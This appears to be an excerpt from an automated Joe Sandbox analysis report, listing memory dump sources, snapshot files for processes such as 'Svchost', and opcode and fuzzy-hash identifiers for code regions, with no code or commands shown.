                                                                                                                                                                                                          • Opcode ID: 4b21440d994077f34ad8c26040ab99653f84d35b92acf1e1879394cfd5e41a12
                                                                                                                                                                                                          • Instruction ID: fc9194292bc581cc5056c7e44f7ee91b9a75fabedc5f03edaaaaf53cc202f7a5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b21440d994077f34ad8c26040ab99653f84d35b92acf1e1879394cfd5e41a12
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A812861F0DB860FE755E77888A62A57BA1EF46310F0406FAD449C72D3DD6CA84B83D1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 6d96fd474685c478a0b413c8a8e9da3fbfd2e61958ee300c0507a92e5bce7915
                                                                                                                                                                                                          • Instruction ID: 670ea12832eb3b05b04b8bc7baefb34775f0ca29cc5d28ecb86f9e96b742c9b5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d96fd474685c478a0b413c8a8e9da3fbfd2e61958ee300c0507a92e5bce7915
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD610821B1D94E0FE7A5E76C98B61BD77D2EF8A311F4401BAD44DD32D2DE68AC428390
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 13999f1334ee7aa334c72e55858fedb434a6f7619ddc07d501a99d6d13834da0
                                                                                                                                                                                                          • Instruction ID: bbffe3e2a424d0f1b7062dd0f02031b08fcfe069484e10e3f9517e933bb0829a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13999f1334ee7aa334c72e55858fedb434a6f7619ddc07d501a99d6d13834da0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28614661B4DB8A0FD7969B7844B52A97FE1EF9B210F0840BAD08AC72E3CD6C5847C751
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 021647ecaaa558e4407a7169b1e20538dd624f9477c4b211c5edbc49ea315d4a
                                                                                                                                                                                                          • Instruction ID: 72643a817e262afb39d9f56667b0d1dadb3bc8ffb8bc647928085c4bc181f469
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 021647ecaaa558e4407a7169b1e20538dd624f9477c4b211c5edbc49ea315d4a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13613371A0D6898FD755DF6C88A56B97FE0EF53310F0841BED049C7293DE68A806CB81
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 9de81d3bbea4bf1b1dc4e05b4ff5b0721e1b20795c89df263db9cae7f4e3cf86
                                                                                                                                                                                                          • Instruction ID: 07aea2e3755b634803fc667190e1a4856077ae345e628c021d8b130187420f64
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9de81d3bbea4bf1b1dc4e05b4ff5b0721e1b20795c89df263db9cae7f4e3cf86
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47512771B1890A4FEB94EB6C80B52B977D2FF99314F44417AD04ED33D2CE7868428B81
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: ea27240f388a418b93639f201806069c9455182fbf190bb68b517e81a1486fce
                                                                                                                                                                                                          • Instruction ID: 8e01e9f640dc84ab315032107bf423cb3b3d600ee6bbfcc848652e99105fd8bf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea27240f388a418b93639f201806069c9455182fbf190bb68b517e81a1486fce
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D431C621B18A095FEB54BBEC98693BD77D1EF99311F1402BAE40DC32D3DD6868418392
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 8dccdfa241f2e38514a84a709011a07ff5afe2ef6c1963722fd35940bb57d9d8
                                                                                                                                                                                                          • Instruction ID: 0d34e1e940608528ff0dbffa93b916b67c35dd34f36bb6655ac072b23734e499
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dccdfa241f2e38514a84a709011a07ff5afe2ef6c1963722fd35940bb57d9d8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E031C721B18D095FFB94BBEC48693BD72D1EF99312F14027AE00DC32D2DD6868418391
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 3fffaebe31ef57772d7b264de3fa4d1354de8ccf6ccbd5d3d351451186ca785b
                                                                                                                                                                                                          • Instruction ID: 8837ccb4690b214176acaf46ac3fb89c47d469bc083eb5eeb8146540a653a8ac
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fffaebe31ef57772d7b264de3fa4d1354de8ccf6ccbd5d3d351451186ca785b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C315E34B58A0A9FEB54EBA8C4B56E977F1FF99300F544579D009D3296CE3868418B90
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: fac493853626994eb15ff5a120732ff58d18c3850edbf64d74ccf1a88113b531
                                                                                                                                                                                                          • Instruction ID: 5f22977b582808338b28b2c4d2d0d86f2c2beb1891728cf41696dc4955985f48
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fac493853626994eb15ff5a120732ff58d18c3850edbf64d74ccf1a88113b531
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A31903150C7488FDB29DFA8C895AEABBF0FF56320F0482AFD049C7552D764A806CB51
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 6850b5987535eda4db7efcb2c4af2bc8d2a10ad142a957f4b9c450713e45aebe
                                                                                                                                                                                                          • Instruction ID: 4daf84391699394074a5ccae99fab8e2efde32f59574d862dda413ba139b6c46
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6850b5987535eda4db7efcb2c4af2bc8d2a10ad142a957f4b9c450713e45aebe
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C316330F4C60A8FEB98EB6880A56FD72E1EF59314F54517DD11ED32D2CE6DA8428B80
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 4066276e07f2b90384ee431d51490165499f0d6e4cd9d51b4b88ad73dd578939
                                                                                                                                                                                                          • Instruction ID: bbf66464ec7f8815555f1bc5d0a9ad8bb7c88d90a1f000f8cae2935c49110330
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4066276e07f2b90384ee431d51490165499f0d6e4cd9d51b4b88ad73dd578939
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84210762B1C9460FE7686B6C14B92FA66C2EFDA311B54017EE08EC32D7DE6C680342C5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: f032917981028e22ac6b2ea7c77c2d316d314988eadde151794e59af46b96186
                                                                                                                                                                                                          • Instruction ID: 926e36290e5777673f4b204012ac7c5271c932cbb062cafb123ad52eb96669ed
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f032917981028e22ac6b2ea7c77c2d316d314988eadde151794e59af46b96186
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5216271908A0C8FDB68DF98D88ABFABBF4FB55321F00822ED05AD3651DA747445CB91
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 39dec401ae01e1f0e81d9ffc69348bc33285ee731fffca4140962e422efc073a
                                                                                                                                                                                                          • Instruction ID: 92f1958568b69c6fd6d866871bee05176d77ed8e5b273d516295b69fc442f163
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39dec401ae01e1f0e81d9ffc69348bc33285ee731fffca4140962e422efc073a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D219231759A599FEB95EB6C84E69A93BE1FB59701B4001EAD008C7352DB28A8428B81
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 35783cf548aac47a4ba0070ca866d8c7645e837052ba78964d9be20f0f961634
                                                                                                                                                                                                          • Instruction ID: 5bb8ad772256a517b2c7b1ec0d2030119f9440f4ac35c228376eb27b4ec042cf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35783cf548aac47a4ba0070ca866d8c7645e837052ba78964d9be20f0f961634
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1901F932B19D1C5FF7A0E72C94A66ED37E2FB99710F000176E009D3242DD2878424BC1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 3478565b18ed503f4c5cc5f948f45b48664216662bcd959326a45945d3128da5
                                                                                                                                                                                                          • Instruction ID: ed0f73c06422abaf194e7d8cf8eef0de53ddb2036a822e84d1b4f987f5326b9b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3478565b18ed503f4c5cc5f948f45b48664216662bcd959326a45945d3128da5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3014215A0C7C10FE752AB3858B55767FE19F87240B4805BAD889CB0EBDC08A9898382
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 476825a34654ba3c6c3774dde6ba3184a77a87422e29c23f27d50ddb8a967fe1
                                                                                                                                                                                                          • Instruction ID: bae9cf45ff7bc4eb2bd882d04947cc0efb54ed0d11835a3123d6de1428c3d27c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 476825a34654ba3c6c3774dde6ba3184a77a87422e29c23f27d50ddb8a967fe1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88F08731F0592D4FEB54FBA898591FEB7F1FB58202F0002BBE409D2295DE74694087C1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 3d000268636302a69e7f2396217a281dace86d6a0bf8da29454c3576394b7245
                                                                                                                                                                                                          • Instruction ID: 12d67de28bc76645b0c24abf0f39e2baf617bc8498ef0f60914d4b686f722b44
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d000268636302a69e7f2396217a281dace86d6a0bf8da29454c3576394b7245
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89F03A2184E3C95FD7035B745C355A57FB4AE53200B0D41DBE888CB0A7DA1C6519D3A3
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: b7ffe23bde743589b7e18c27b3cd2953f3246f46a5ee02571f08767157fbc820
                                                                                                                                                                                                          • Instruction ID: d7f49feee27cceafc6545c24d31c27a88d4a50ea4b25d4abbbe553743c6687ea
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7ffe23bde743589b7e18c27b3cd2953f3246f46a5ee02571f08767157fbc820
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E0203190CE4C4FDF41AB59D8546E97BA0FF8E31CF0800BBE55CD3281CA655555C355
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: b169cb9915f990253efc24a2eefe72b4e22d4f5ef1226921eb50dfed5b2ba4c8
                                                                                                                                                                                                          • Instruction ID: 0a15098b094bc5741e84168c5968c53b4247e371b64cb6fceaba2e80bde30b99
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b169cb9915f990253efc24a2eefe72b4e22d4f5ef1226921eb50dfed5b2ba4c8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45D01259F6810307E715777554721BE20C75FC5624B595878E10EDB697DD7CE8021280
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 72f1af45c68aab79ef97c6db834e5204a170bb11e9f2d8f64390c6fedc3685b4
                                                                                                                                                                                                          • Instruction ID: 35fc8a6dca1183e2b0064a9938bd91a6c497288dbe9a3b127bb4c39812f36eac
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72f1af45c68aab79ef97c6db834e5204a170bb11e9f2d8f64390c6fedc3685b4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93B09200F6E84A089419337949E20ADBB20AB8B220FC408B0D98980082DD8E549662C2
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: dc0f3855ac096781c517240ec80ffe0f3b67b8b0c8be0dc5ce8c4ade84c9919d
                                                                                                                                                                                                          • Instruction ID: 59fd2410b8d808d5bc21df18805c5ce6e1227ea320ece4f87e5de44763b082f2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc0f3855ac096781c517240ec80ffe0f3b67b8b0c8be0dc5ce8c4ade84c9919d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31A00204D9B80F05984832BA1DD70ED74506B8B114FC55160E91CD498AECCE15E912E3
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.2157113995.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ffd34890000_Svchost.jbxd
Memory Dump Source
• Source File: 00000004.00000002.2157113995.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffd34890000_Svchost.jbxd
Memory Dump Source
• Source File: 00000005.00000002.2198558358.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 3171d82bdafc3e9fd859a6d3b749d55238d3b9b6d7f74f330f511e726e6cc587
                                                                                                                                                                                                          • Instruction ID: 84ee700cbd9bc95bcaa0a7f4d03759e8af97aab0c4c4ca506bd95ee6153d84f1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3171d82bdafc3e9fd859a6d3b749d55238d3b9b6d7f74f330f511e726e6cc587
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1632B620B29A494BE798EBBC84B5679B7D2FF99311F580579E40ED32C2DE78AC018741
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2198558358.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 12aa2f9bc69cfa2b9a08df8fd157b269148351442b358fee45670cf4edb656e7
                                                                                                                                                                                                          • Instruction ID: 6726df2551fb5d67b6db8978ffd372566007b3a027b0603278e7ada19fb77a13
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12aa2f9bc69cfa2b9a08df8fd157b269148351442b358fee45670cf4edb656e7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F922B620B1AA494FE7A8EB7C84B56B977D2FF89311F480579E40EC32C2DE78AC018351
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.2198558358.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd348a0000_Svchost.jbxd
Memory Dump Source
• Source File: 00000006.00000002.2253309019.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd34880000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: f20135c36d72b22a58da00153fb567aa0a6d0dcc7ff80252d50c670748f3437b
                                                                                                                                                                                                          • Instruction ID: f30a1524ea6df54a1dd5501f46f46bef901fe813cf97dc90cb54ed16a025942f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f20135c36d72b22a58da00153fb567aa0a6d0dcc7ff80252d50c670748f3437b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31127F20B28A094BE798FBBC84B5679B3D6FF99315F540579E44EC32D2DE3CA8418741
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2253309019.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34880000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 8b5be4f2ebedfeede5347faf55a3d7923e3b96f5e3fc1d0180f8f4cbd23ca02c
                                                                                                                                                                                                          • Instruction ID: abb0bccca16c89379ce1f2244ec1cb5232d53f68efea7436f787d9f5102964a4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b5be4f2ebedfeede5347faf55a3d7923e3b96f5e3fc1d0180f8f4cbd23ca02c
